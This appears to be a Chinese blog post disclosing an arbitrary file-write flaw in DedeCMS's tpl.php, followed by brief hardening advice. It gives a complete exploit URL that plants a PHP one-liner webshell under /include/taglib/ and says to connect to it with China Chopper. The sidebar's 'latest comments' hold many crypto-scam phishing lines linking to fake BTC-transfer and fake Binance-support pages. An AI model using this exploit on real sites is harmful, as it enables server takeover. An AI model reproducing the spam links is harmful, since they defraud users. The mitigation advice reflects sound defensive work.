小灰博客--小灰IT技术博客 | sky00.com

织梦CMS最新任意写入漏洞

今天服务器提示有webshell文件,上去看下确实是被写入了一句话木马。顺藤摸瓜发现织梦/dede/tpl.php竟然存在任意写入漏洞,也不知道这个漏洞有多久了,是否被公开,既然发现了就记录下把,具体是利用tpl.php的文件管理功能,对标签的一个写入漏洞。exp是这样的

1
www.xxx.com/dede/tpl.php?action=savetagfile&actiondo=addnewtag&content=%3C?php%20$s=create_function(%27%27,$_REQUEST[x]);$s();?%3E&filename=leo.lib.php

访问确定后会在/include/taglib/目录下面生成一个叫leo.lib.php的文件。这个文件里面是一句话木马,就是url里写的PHP代码,如图

(图丢了,自己领悟)

具体想写什么在url里带入就行,接下来上菜刀,链接即可。需要注意一点,生成的文件名必须是 xxx.lib.php

具体防护方法修改后台路径肯定是必不可少的 ,当然现在曝下织梦路径也不是什么难事,首先可以关闭/include/taglib/下的写入权限,其次其实很多网站根本用不着文件管理器,建议直接把tpl.php文件删除或者重命名。


如果该文章帮到了您,不妨帮忙分享支持下博主!
同时也欢迎各位技术爱好者加入IT技术群(点击即可):70035098 互相交流学习!

分享该文章到:

6 条评论

  1. 今日头条说道:

    文章不错支持一下吧

  2. 头条说道:

    文章不错非常喜欢

  3. 骨骼尚美说道:

    不错的文章,学习了



发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

分类

最新评论

  • We send a transfer from unknown user. Next > https://graph.org/GET-BITCOIN-TRANSFER-02-23-2?hs=9e710a17c6f1893b8975843ad65a53ec&:fqrvth
  • Ticket: SENDING 0.75905835 BTC. Next => https://graph.org/GET-BITCOIN-TRANSFER-02-23-2?hs=189b84788c5e6405c53f7dd1193b9874&:h8yo8m
  • + 0.75386069 BTC.NEXT - https://graph.org/GET-BITCOIN-TRANSFER-02-23-2?hs=d9564a149cf7ebbc725fcfce1bd3d512&:bc1353
  • Sending a transfer from unknown user. Take >> https://graph.org/GET-BITCOIN-TRANSFER-02-23-2?hs=b0daecdb412780460f6d70d2ebe7020c&:aau2lw
  • You have received a message(-s) № 221889. Open >> https://telegra.ph/Binance-Support-02-18?hs=bd8a1e7af9a0091b9e1cfeb86b9552cb&:kqpbhi
  • Notification; Operation №IV67. Go to withdrawal => https://telegra.ph/Binance-Support-02-18?hs=08b576daf9c0848743e65271d9d88559&:qwsyif
  • + 0.75961990 BTC.NEXT - https://telegra.ph/Binance-Support-02-18?hs=20bcd57ec809274e19061c909e168662&:p4uthc
  • We send a transaction from our company. Withdrаw =>> https://telegra.ph/Binance-Support-02-18?hs=3f08de96112b4bab631df916e9c95f9e&:5k6fth
  • Notification: Transaction №TN98. ASSURE =>> https://telegra.ph/Binance-Support-02-18?hs=8b618b6f3e2558ea545b01f25c66ea45&:5jevqs
  • Sending a transaction from unknown user. Continue > https://telegra.ph/Binance-Support-02-18?hs=1d869d5a917cbf0e695c5782af266195&:nnl072
  • + 0.75788585 BTC.GET - https://telegra.ph/Get-BTC-right-now-01-22?hs=9e710a17c6f1893b8975843ad65a53ec&:80ymq4
  • You have a email № 897905. Read >>> https://telegra.ph/Get-BTC-right-now-01-22?hs=7fc809c4247ff3bb3e2b81fd7b90d625&:whaht3
  • You have received a message # 76978. Go >>> https://telegra.ph/Get-BTC-right-now-01-22?hs=3da051666d269a0bc63a99730221a24b&:pt6kzb
  • You got a transfer from user. Get => https://telegra.ph/Get-BTC-right-now-01-22?hs=3f08de96112b4bab631df916e9c95f9e&:zi27wf
  • You have received a notification № 252423. Read >>> https://telegra.ph/Get-BTC-right-now-01-22?hs=8b618b6f3e2558ea545b01f25c66ea45&:z91sjl
  • We send a transfer from unknown user. Continue >> https://telegra.ph/Get-BTC-right-now-01-22?hs=e4c49dd9cb5ed33f97a29bc92a741521&:iiaw99
  • You have a transaction from unknown user. GЕТ => https://telegra.ph/Ticket--6974-01-15?hs=9e710a17c6f1893b8975843ad65a53ec&:409z2a
  • Ticket: TRANSFER 0,75924235 BTC. Next => https://telegra.ph/Ticket--6974-01-15?hs=8f87d0d2843e103c87c4bd683c9bda39&:mqjjeh
  • Email- Transaction #WX47. ASSURE > https://telegra.ph/Ticket--6974-01-15?hs=48af46897a78ce23e02d3d6d91453c82&:30gz1l
  • You have 1 email № 583291. Open >> https://telegra.ph/Ticket--6974-01-15?hs=46cca2220f62b645c465c3659609f169&:hudwy0